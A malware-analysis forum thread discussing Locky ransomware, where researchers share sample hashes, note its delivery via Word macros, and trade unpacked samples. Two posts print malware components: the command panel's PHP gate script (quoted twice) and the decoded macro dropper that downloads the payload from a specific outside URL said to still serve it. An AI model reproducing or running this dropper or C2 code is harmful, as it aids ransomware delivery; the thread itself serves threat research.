Locky ransomware

Forum for analysis and discussion about malware.
Post Reply
User avatar
Blaze
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Contact:

Locky ransomware

Post by Blaze » Wed Feb 17, 2016 4:48 pm

You do not have the required permissions to view the files attached to this post.

User avatar
maddog4012
Posts: 74
Joined: Mon Aug 04, 2014 6:53 pm

Re: Locky ransomware

Post by maddog4012 » Wed Feb 17, 2016 7:42 pm

this malware is dropped from a word doc that arrives in E-mail
You do not have the required permissions to view the files attached to this post.

benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Locky ransomware

Post by benkow_ » Thu Feb 18, 2016 8:49 am

Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)

Code: Select all

<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

eli
Posts: 1
Joined: Wed Feb 10, 2016 12:48 pm

Re: Locky ransomware

Post by eli » Thu Feb 18, 2016 12:43 pm

Seems like it stopped working. Servers taken down?

User avatar
frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Contact:

Re: Locky ransomware

Post by frank_boldewin » Tue Feb 23, 2016 4:23 pm

eli wrote:Seems like it stopped working. Servers taken down?
maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code:

Code: Select all

function downloadToFile(url,file)
{
	var xhr=new ActiveXObject("msxml2.xmlhttp");
	ado=new ActiveXObject("ADODB.Stream");
	xhr.open("GET",url,false);
	xhr.send();
	if(xhr.status===200)
	{
		ado.type=1;
		ado.open();
		ado.write(xhr.responseBody);
		ado.saveToFile(file);
		ado.close();
		return xhr.responseBody; 
	}
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
The executable can still be downloaded.

User avatar
frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Contact:

Re: Locky ransomware

Post by frank_boldewin » Wed Feb 24, 2016 2:14 pm

Just in case one is interested. attached is an unpacked version of locky.
You do not have the required permissions to view the files attached to this post.

w0rm
Posts: 1
Joined: Mon Apr 21, 2014 4:09 pm

Re: Locky ransomware

Post by w0rm » Wed Feb 24, 2016 5:38 pm

There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)

User avatar
Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Locky ransomware

Post by Xylitol » Wed Feb 24, 2016 6:27 pm

in attachment.
You do not have the required permissions to view the files attached to this post.

FafZee
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am

Re: Locky ransomware

Post by FafZee » Thu Feb 25, 2016 8:37 am

Unpacked in attachment
You do not have the required permissions to view the files attached to this post.

User avatar
p1nk
Posts: 44
Joined: Thu Oct 29, 2015 1:09 am

Re: Locky ransomware

Post by p1nk » Fri Feb 26, 2016 7:12 am

benkow_ wrote:Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)

Code: Select all

<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

Do you have an archive of all the collected PHP pages?

Post Reply